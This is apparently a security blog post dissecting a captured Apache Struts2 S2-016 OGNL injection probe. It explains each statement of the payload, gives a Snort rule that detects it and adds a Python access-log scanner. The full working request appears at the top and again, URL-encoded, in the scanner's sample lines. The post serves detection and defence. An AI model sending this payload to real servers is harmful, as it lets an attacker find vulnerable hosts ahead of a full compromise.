I recently posted notes on an Apache Struts2 Remote Code Execution attempt. Here's the guts of the attack:
GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}
But what is it doing? Let's walk through it in a bit more detail.
Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications.
Back in 2013 (S2-016, CVE-2013-2251), Apache Struts 2.0.0 through 2.3.15 allowed remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
In this example the vulnerable 'redirect:' prefix is the one being used.
GET /How.do?redirect:
A request to a Java servlet on an Apache Tomcat server that the attacker hopes is running an old Struts version still vulnerable to the redirect: code execution issue.
${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
Get this web request's HttpServletResponse object so the attacker can tweak the settings on what is sent back.
#res.setCharacterEncoding("UTF-8"),
Set the response to a readable character set, UTF-8.
#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
Get this web request's HttpServletRequest object so the attacker can use what it exposes.
#res.getWriter().print("dir:"),
#res.getWriter().println(
#req.getSession().getServletContext().getRealPath("/")
),
#res.getWriter().flush(),
#res.getWriter().close()}
Instead of redirecting, the request now writes "dir:" followed by the absolute path on disk where the Apache Tomcat server is hosting the web application's files, then flushes and closes the response.
Summary: This attack is not actually doing anything except validating that they've found a vulnerable server. Odds are that this is an automated bot scanning the internet for victims; if the bot gets a response back (like the absolute path on disk where Tomcat is running), it will immediately send another, more malicious request that drops a persistent payload to compromise the server.
Keep your software versions up-to-date.
FYI - This is the Snort rule that catches this attempt:
SERVER-APACHE Apache Struts2 blacklisted method redirect (1:29748)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-APACHE Apache Struts2 blacklisted method redirect"; flow:to_server,established; content:".do?redirect|3A|"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, service http; reference:cve,2013-2248; reference:cve,2013-2251; reference:url,struts.apache.org/release/2.3.x/docs/s2-016.html; reference:url,struts.apache.org/release/2.3.x/docs/s2-017.html; classtype:web-application-attack; sid:29748; rev:1; )
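As an added example (not code from the original post), here is a small Python scanner that applies the same check as the Snort rule's ".do?redirect:" content match to Tomcat access log lines after the fact: it URL-decodes each request URI, looks for the three S2-016 prefixes, and flags the ones carrying OGNL expression markers. The common log format, the sample lines and the IP addresses are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Parameter prefixes through which S2-016 (CVE-2013-2251) evaluates OGNL.
STRUTS_PREFIXES = ("action:", "redirect:", "redirectaction:")
# OGNL expression delimiters plus the context lookup the probe above uses.
OGNL_MARKERS = ("${", "%{", "#context", "#_memberaccess", "@java.lang")

def inspect_uri(uri):
    """Return (prefix, has_ognl) for one request URI; prefix is None when clean."""
    decoded = unquote(unquote(uri))  # two passes also catch double-encoded payloads
    _, _, query = decoded.partition("?")
    for param in query.split("&"):
        low = param.lower()
        for prefix in STRUTS_PREFIXES:
            if low.startswith(prefix):
                return prefix, any(marker in low for marker in OGNL_MARKERS)
    return None, False

# Common log format (assumed): ip - - [timestamp] "METHOD uri HTTP/x.y" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\w+ (\S+) HTTP/[\d.]+" (\d{3})')

def scan_access_log(lines):
    """Yield (ip, status, prefix, has_ognl) for each request that uses a Struts prefix."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, uri, status = m.groups()
        prefix, has_ognl = inspect_uri(uri)
        if prefix:
            yield ip, int(status), prefix, has_ognl

def ognl_probes_by_source(lines):
    """Count OGNL probes per source IP so a scanning bot stands out."""
    return Counter(ip for ip, _, _, ognl in scan_access_log(lines) if ognl)

# Constructed sample lines; the first is a shortened, URL-encoded form of the probe in the post.
SAMPLE_LOG = [
    '203.0.113.9 - - [01/Jan/2015:10:00:00 +0000] "GET /How.do?redirect:%24%7B%23res%3D%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2C%23res.getWriter().println(%22dir:%22)%7D HTTP/1.1" 200 73',
    '203.0.113.9 - - [01/Jan/2015:10:00:01 +0000] "GET /How.do?redirectAction:%25%7B%23context%7D HTTP/1.1" 200 12',
    '198.51.100.4 - - [01/Jan/2015:10:00:02 +0000] "GET /How.do?redirect:/login.jsp HTTP/1.1" 302 0',
    '192.0.2.7 - - [01/Jan/2015:10:00:03 +0000] "GET /index.do?user=bob HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
    print(ognl_probes_by_source(SAMPLE_LOG))
```

A 200 response to an OGNL-bearing probe is the line to chase first, since that is the reply the bot is waiting for before it sends the real payload.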
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.